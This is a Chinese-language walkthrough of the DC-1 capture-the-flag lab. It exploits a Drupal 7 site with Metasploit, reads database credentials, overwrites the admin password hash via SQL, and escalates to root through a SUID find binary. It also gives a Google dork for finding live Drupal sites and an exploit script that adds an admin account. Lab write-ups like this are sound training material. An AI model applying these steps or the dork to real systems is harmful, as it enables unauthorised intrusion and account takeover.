主机发现
我们使用netdiscover
搜寻局域网内的主机。
利用Nmap
对192.168.234.176
进行端口探测
nmap -Pn -A 192.168.234.176 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.176
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.176
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.176:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.234.176:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.234.176:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://192.168.234.176:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://192.168.234.176:80/user/
| Form id: user-login
| Form action: /user/
|
| Path: http://192.168.234.176:80/user
| Form id: user-login
|_ Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.drupal.org/SA-CORE-2014-005
| http://www.securityfocus.com/bid/70595
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
|_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36232/udp status
| 100024 1 44155/tcp status
| 100024 1 44611/udp6 status
|_ 100024 1 53919/tcp6 status
MAC Address: 00:0C:29:BD:B2:2E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 192.168.234.176
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds```
在扫描的过程中,使用了nmap的vuln
脚本,这个脚本用于检测目标主机是否有常见的漏洞。
从扫描的结果来看,我们得到该机器开放的80端口,搭建了一个CMS为Drupal
的网站,Drupal
的版本为7,可以看到有很多的漏洞。
写一些小拓展
我们可以在谷歌中使用Google Hack,大量查找Drupal的网站,语法为inurl:"q=user/password"
我们在实战中为快速得知Drupal
的版本,我们可以在robots.txt
中查找MAINTAINERS.txt
文件,该文件中会泄露版本号。
漏洞探测
我们在kali中使用searchsploit
对drupal进行查找可以利用的漏洞。
“searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。
SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。
searchsploit Drupal
漏洞利用
在searchsploit
的结果中看到几个漏洞可以通过msf进行利用。
打开msf,搜寻exp
use 4
info
查看exp详细的信息
我们的目标网站刚好处在可利用范围内
set rhosts 192.168.234.176
设置好目标机器的IP
exploit
利用漏洞
目标机器上线,漏洞利用成功。
exp设置要注意几点
通常我们的web服务都是搭建在80端口,所以该exp默认帮我们填写了80端口。如果该web服务不在80端口而在888端口,则我们需要将端口设置为888。另外关于targeturi
,如果该cms在搭建在/abc
目录下,则需要设置targeturi
为/abc
。
查找flag
Flag1
执行ls
命令,找到flag1
cat flag1.txt
Every good CMS needs a config file – and so do you.
也就是让我们寻找web的配置文件,显而易见
Flag2
cat web.config
,发现啥也没有。忽然想起是CMS的配置文件。
然后,查找了一番,最终确定要找的配置文件为www/sites/default
中的settings.php
flag2
Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?
暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)。你能用这些证件做什么?
在flag2的下面找到了mysql数据库的用户名和密码,我们可以尝试登录mysql去获取账号和密码。
Flag3
利用python -c '__import__("pty").spawn("/bin/bash")'
,获取交互shell。
登录mysql
mysql -u dbuser -p
数据库查询
show database;
列出当前所有的数据库
use drupaldb
进入指定的数据库
show tables;
查询表
我们最关注的应该就属user表了,所以直奔主题。
在flag2中提示到,破解不是唯一的办法。在这里我们可以直接利用update修改admin的密码,但由于该密码是加密的,所以我们也需要找到相对应的加密脚本
。
利用
quit
命令退出mysql。
最终在网站目录下的scripts
中找到了加密脚本
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh drupal.sh generate-d6-content.sh run-tests.sh
cron-curl.sh dump-database-d6.sh generate-d7-content.sh test.script
cron-lynx.sh dump-database-d7.sh password-hash.sh
www-data@DC-1:/var/www/scripts$ ./password-hash.sh
./password-hash.sh
Generate Drupal password hashes from the shell.
Usage: password-hash.sh [OPTIONS] "<plan-text password>"
Example: password-hash.sh "mynewpassword"
All arguments are long options.
--help Print this page.
--root <path>
Set the working directory for the script to the specified path.
To execute this script this has to be the root directory of your
Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
running on Unix). Use surrounding quotation marks on Windows.
"<password1>" ["<password2>" ["<password3>" ...]]
One or more plan-text passwords enclosed by double quotes. The
output hash may be manually entered into the {users}.pass field to
change a password via SQL to a known value.
To run this script without the --root argument invoke it from the root directory
of your Drupal installation as
./scripts/password-hash.sh
这里遇到了点小问题,怎么加密也不成功,结果在用法里发现
若不是以root权限运行脚本,则需要从网站的根目录去进行调用./scripts/password-hash.sh "admin"
得到$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2
更新管理员密码
返回mysql
update users set pass='$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2' where uid=1;
以新密码登录admin账号,找到flag3
Flag4
在摸索hash脚本的时候无意发现的,按照常理的话,/etc/passwd中也可发现。
位于/home
目录下
提示我们需要进行提权,才能得到flag5。
Flag5
利用flag3中的提示,使用find -exec
搜索suid权限的程序:
find / -user root -perm -4000 -print 2>/dev/null
find / type f -perm -u=s 2>/dev/null
最终发现find
具有root
权限
find ./ -exec “whoami” \;以root权限运行whoami
find ./ -exec “/bin/sh” \;
现在已经到手root权限
靶机完成。
&Flag3另外一种方法
在searchsploit
的查询结果中,发现了
我们可以利用此脚本,再给其添加一个管理员以查看flag3.
python 34992.py -t http://192.168.234.176/ -u admin123 -p admin123